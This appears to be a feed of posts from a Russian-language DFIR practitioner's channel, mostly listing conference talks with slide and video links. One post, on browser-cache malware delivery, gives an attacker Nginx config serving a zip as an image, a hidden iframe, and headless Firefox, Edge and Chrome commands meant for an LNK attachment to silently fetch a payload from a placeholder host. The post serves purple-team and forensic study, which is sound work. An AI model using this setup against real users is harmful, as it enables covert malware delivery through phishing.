#presentations
🔵 Решил собрать информацию по своим докладам в одном посте, где добавил как ссылки на сами презентации, так и на записи выступлений 💻

1️⃣CyberCamp 2023. Чертоги оперативной памяти: как проанализировать то, что пока не забыто.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣SOC Tech 2023. Как удачно испортить выходной день DFIR-специалисту?
*️⃣Ссылка на презентацию.

3️⃣BI.ZONE Cybersecurity Meetup №1. Смотритель зоопарка или как DFIR специалисту выжить в незнакомой ему инфраструктуре.
*️⃣Ссылка на презентацию.

4️⃣PHDays 2024. Было ваше — стало наше: что полезного можно найти на серверах злоумышленников.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

5️⃣PHDays 2024. Война с песочницей: техники по ту сторону баррикад.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

6️⃣OFFZONE 2024. Новый инцидент, или Как я снова встретил MikroTik.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

7️⃣CyberCamp 2024. Хроники противостояния: взгляд на RDP с обеих сторон.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления;
*️⃣Дополнительная информация.

8️⃣SOC Forum 2024. Bad Forensicator.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

9️⃣CyberCamp 2025 (MeetUp DFIR). Криминалистика — это не Дикий Запад, здесь есть правила.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления;
*️⃣Дополнительная информация.

1️⃣0️⃣CTI Meetup №3 (Inseca). Уйди в туман, запутай след.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

1️⃣1️⃣CIRF 2025. Куда же упало яблоко, или искусство анализа триажа macOS.
*️⃣Ссылка на презентацию;
*️⃣Дополнительная информация.

#phishing #browser_cache
🔵 На конференции Insomnihack 2025 исследователь компании Orange Cyberdefense представил доклад, посвящённый способу доставки вредоносного ПО с использованием механизмов кэширования веб-браузеров (статья №1, статья №2).
К данной работе хотелось бы добавить некоторое расширение, которое будет рассмотрено ниже. Но сначала кратко пройдёмся по основам.

🔵 Система кэширования веб-браузеров хранит следующие типы данных:
🔹HTML-файлы;
🔹CSS-файлы;
🔹JavaScript-файлы;
🔹медиафайлы;
🔹веб-шрифты.

Однако возникает вопрос: «Как веб-браузеры определяют, какие файлы необходимо добавить в кэш?»
Здесь всё довольно просто — используется HTTP-заголовок Content-Type, который можно контролировать на стороне веб-сервера.

🔴 Настройка сервера атакующей стороны:

Конфигурационный файл Nginx (/etc/nginx/sites-available/default):

...
location /i_am_not_malware.zip {
    add_header NOTMALWARE "purple_team_test";
    types { } default_type image/jpeg;
}
...


Главная страница веб-сайта (/var/www/html/index.html):

...
<iframe src="i_am_not_malware.zip" style="width:0;height:0;border:0;visibility:hidden;"></iframe>
...


🔴 Расширение.
В самом докладе рассматривается пример, при котором пользователю требуется перейти на фишинговый веб-сайт, чтобы файл сохранился в кэше. Однако описанный способ можно применить и в другом виде. Например, можно прописать в LNK-файле ("классическое" вложение в письме) команду перехода на сайт с помощью веб-браузера в headless-режиме (см. ниже). В данном случае файл также будет добавлен в кэш.

Команда №1 (Mozilla Firefox; движок Quantum):

"C:\Program Files\Mozilla Firefox\firefox.exe" --headless --url http://<IP_DOMAIN>/index.html

Примечания:
*️⃣одновременная работа нескольких независимых процессов с одним профилем Firefox невозможна. Поэтому необходимо либо завершить текущий процесс firefox.exe, либо использовать отдельный профиль (создать) для нового процесса:

"C:\Program Files\Mozilla Firefox\firefox.exe" --createprofile sidekick
"C:\Program Files\Mozilla Firefox\firefox.exe" --P sidekick --headless --url http://<IP_DOMAIN>/index.html

*️⃣Каталог расположения кэша: %LOCALAPPDATA%\Mozilla\Firefox\Profiles\*.*\cache2\entries.

Команды №2 (Microsoft Edge, Google Chrome и т.п.; движок Chromium):

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --disable-gpu --disk-cache-size=1073741824 --dump-dom https://<IP_DOMAIN>/index.html

"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --user-data-dir="%USERPROFILE%\AppData\Local\Chrome\purple" --disk-cache-size=1073741824 --dump-dom https://<IP_DOMAIN>/index.html

Примечания:
*️⃣в headless-режиме Google Chrome необходимо указать отдельный каталог для хранения пользовательских данных (параметр --user-data-dir), иначе после завершения сессии кэш и другие данные будут удалены;
*️⃣если файл достаточно большой, рекомендуется увеличить объём кэша на диске (параметр --disk-cache-size), например, до 100 Мбайт;
*️⃣Каталог расположения кэша MSEdge (headless-режим): %LOCALAPPDATA%\Temp\HeadlessEdge*\Default\Cache\Cache_Data.

#uwp #DFIR #mfd2025
🔵 С 11 по 12 сентября проходила девятая ежегодная конференция — Moscow Forensics Day 2025.
На данном мероприятии выступал с докладом на тему "UWP под прицелом DFIR: что скрывают современные Windows-приложения".

Удалось осветить следующие пункты:
1️⃣ Что такое UWP (Universal Windows Platform) и MSIX-пакеты.
2️⃣ Инциденты ИБ, связанные с использованием MSIX-пакетов.
3️⃣ Криминалистические артефакты, возникающие при установке MSIX-пакета, и их источники.
4️⃣ Приложения из Microsoft Store, представляющие интерес для злоумышленников.

🔵 Также отдельно выкладываю список полезных веб-ресурсов/веб-ссылок (оформлено в Obsidian).

P.S.: уже в состоянии ожидания Moscow Forensics Day 2026 🚪

#events
🔵 Пришло время для нового поста! А после него начну публиковать интересные исследования — ждите их в декабре. Пора освежить канал не только рассказами о выступлениях, но и чем-то новым. 🍩

1️⃣Про SOC Forum я уже писал в предыдущем посте, но напомню, что 20 ноября будет доклад на тему «После Red Team можно не бояться атак... Не бояться атак, да?». Да-да, там также будут мемы. Куда же без них!

2️⃣А 21 ноября будет эфир, завершающий арку CyberCamp 2025.
На нём будет:
➖ разбор четырех заданий их авторами: «Горький коммит» из соло-программы (моё наследие; будет разбор данного задания от меня🍩), а из командных киберучений — to My Curious Programmer, «Политик аналитик», NightCall;
➖ подведение итогов кэмпа и статистика — самые интересные доклады и задания, самые активные участники, обсуждение обратной связи и планов на будущее;
➖ возможность выиграть еще немного мерча!

3️⃣И напоследок, 26 ноября совместно с Николаем Микрюковым (@Nmikryukov) будем выступать на конференции ZeroNights 2025 с докладов «Горшочек, не вари! Истории про Web3-ловушки», где расскажем про существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.

Ну и мем для привлечения внимания 🥳

#cybercamp2025 #DFIR #task
🔵 Настало время опубликовать пост с веб-ссылками на доклады и разбором одного задания с CyberCamp 2025. Максимальная концентрация DFIR. 🍩

1️⃣ Доклад «Первое правило CI/CD-клуба: компрометация начинается с доверия».
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

2️⃣ Разбор задания «Горький коммит».
*️⃣Ссылка на презентацию;
*️⃣Запись эфира с разборами кейсов.
P.S.: в разборе присутствуют 2 веб-ссылки на дополнительный материал:
➖подготовка к эмуляции атаки;
➖эмуляция действий атакующих.

🔵 И конечно, не могу не упомянуть доклады от своих любимок (😍):

3️⃣Доклад «ИБ-специалист в отпуске? Поздравляю, теперь ты – инцидент-респондер!» от Ивана Грузда.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

4️⃣Доклад «Чертовски хороший Compromise Assessment» от Анастасии Петровой.
*️⃣Ссылка на презентацию;
*️⃣Запись выступления.

#socforum2025 #zeronights2025
🔵 Последние 2 доклада в этом году (🍩):

1️⃣ Доклад «После Red Team можно не бояться атак... Не бояться атак, да?» [SOC Forum 2025].
➖ Совместно с Олегом Скулкиным (ссылка на TG-канал).
Описание доклада:

В докладе рассмотрим различия в тактиках, техниках и процедурах (TTP) между реальными хакерскими группировками и командами Pentest / Red Team. Эта разница объясняется тем, что профили атак, используемые в пентестах, часто не отражают реальные угрозы. 

Доклад поможет понять, как отличать инциденты, связанные с реальными атаками, от имитаций, а также почему реагирование на «пентестовые» сценарии могут привести к ложному чувству защищенности.

*️⃣Ссылка на презентацию;
*️⃣Запись выступления (будет позже).

2️⃣ Доклад «Горшочек, не вари! Истории про Web3-ловушки» [ZeroNights 2025].
➖ Совместно с Николаем Микрюковым (@Nmikryukov).
Описание доклада:

Смарт-контракты, которые только притворяются уязвимыми... В нашем докладе мы рассмотрим существующие и ранее применявшиеся в Web3 трюки децентрализованных ханипотов.

*️⃣Ссылка на презентацию;
*️⃣Запись выступления (будет позже).